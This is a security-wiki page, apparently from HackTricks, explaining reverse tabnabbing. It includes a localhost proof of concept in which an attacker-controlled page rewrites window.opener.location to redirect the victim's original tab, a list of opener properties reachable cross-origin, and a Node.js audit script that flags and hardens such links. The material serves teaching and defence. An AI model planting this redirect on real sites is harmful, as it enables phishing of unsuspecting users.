{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}

# Description

The **attacker** controls the link that the **victim** will click. Create the following pages in a folder and run a web server with `python3 -m http.server`.\
Then **access** `http://127.0.0.1:8000/vulnerable.html`, **click** the link, and note how the **original website's URL changes**.

{% code title="vulnerable.html" %}
```markup
<html>
<body>
<h1>Victim Site</h1>
<!-- target="_blank" with rel="opener" keeps window.opener reachable from the new tab -->
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
</body>
</html>
```
{% endcode %}

{% code title="malicious.html" %}
```markup
<html>
<body>
<script>
// Navigate the opener tab (vulnerable.html) to the attacker's page
window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";
</script>
</body>
</html>
```
{% endcode %}

{% code title="malicious_redir.html" %}
```markup
<html>
<body>
<h1>New Malicious Site</h1>
</body>
</html>
```
{% endcode %}

## Accessible properties

In a scenario where the access is **cross-origin**, the properties of the **window** JavaScript class instance referenced through the **opener** JavaScript object that a malicious site can access are limited to the following:

- **`opener.closed`**: accessed to check whether the window has been closed; returns a boolean.
- **`opener.frames`**: gives access to all iframe elements within the current window.
- **`opener.length`**: returns the number of iframe elements present in the current window.
- **`opener.opener`**: a reference to the window that opened the current window can be obtained through this property.
- **`opener.parent`**: returns the parent window of the current window.
- **`opener.self`**: gives access to the current window itself.
- **`opener.top`**: returns the topmost browser window.

However, if the domains are identical, the malicious site can access all properties exposed by the [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript object reference.

# Prevention

Prevention information is documented in the [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5_Security_Cheat_Sheet.html#tabnabbing).

## References

* [https://owasp.org/www-community/attacks/Reverse_Tabnabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing)
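As an added example (not part of the original page), a small Node.js audit helper that finds anchors like the one in vulnerable.html which leave `window.opener` reachable from the new tab, and rewrites them with the `rel="noopener noreferrer"` mitigation the Prevention section points to; the sample HTML is constructed here.

```javascript
// Added audit helper (not from the original page): flags <a target="_blank">
// links that leave window.opener reachable, i.e. that carry rel="opener" or
// lack rel="noopener"/"noreferrer", and rewrites them. Regex-based so it runs
// under plain Node with no dependencies; use a real HTML parser for production.
const ANCHOR_RE = /<a\b[^>]*>/gi;
const REL_RE = /\brel\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/i;

// Value of one attribute on an opening tag, or null if absent.
function attrValue(tag, name) {
  const m = tag.match(new RegExp(`\\b${name}\\s*=\\s*("([^"]*)"|'([^']*)'|([^\\s>]+))`, 'i'));
  return m ? (m[2] ?? m[3] ?? m[4]) : null;
}

// True when the anchor opens a new browsing context that keeps window.opener.
function leaksOpener(tag) {
  const target = attrValue(tag, 'target');
  if (!target || target.toLowerCase() !== '_blank') return false;
  const rel = (attrValue(tag, 'rel') || '').toLowerCase().split(/\s+/).filter(Boolean);
  if (rel.includes('opener')) return true; // explicitly re-enables the opener
  return !rel.includes('noopener') && !rel.includes('noreferrer');
}

function findLeakyAnchors(html) {
  return (html.match(ANCHOR_RE) || []).filter(leaksOpener);
}

// Hardened rewrite: drop "opener", add "noopener noreferrer" on each leaky anchor.
function hardenAnchors(html) {
  return html.replace(ANCHOR_RE, (tag) => {
    if (!leaksOpener(tag)) return tag;
    const rel = (attrValue(tag, 'rel') || '').split(/\s+/)
      .filter((t) => t && t.toLowerCase() !== 'opener');
    for (const t of ['noopener', 'noreferrer']) {
      if (!rel.some((r) => r.toLowerCase() === t)) rel.push(t);
    }
    const relAttr = `rel="${rel.join(' ')}"`;
    return REL_RE.test(tag) ? tag.replace(REL_RE, relAttr) : tag.replace(/>$/, ` ${relAttr}>`);
  });
}

// Constructed sample mirroring the vulnerable.html link above.
const SAMPLE_HTML = `<h1>Victim Site</h1>
<a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a>
<a href="/help" target="_blank">no rel at all</a>
<a href="/about" target="_blank" rel="noopener">Safe</a>
<a href="/same-tab">Same tab</a>`;

console.log(findLeakyAnchors(SAMPLE_HTML), hardenAnchors(SAMPLE_HTML));
```

Modern browsers already treat `target="_blank"` as `noopener` by default, but an explicit `rel="opener"`, as in vulnerable.html, restores `window.opener`, which is why the check reports it as a finding.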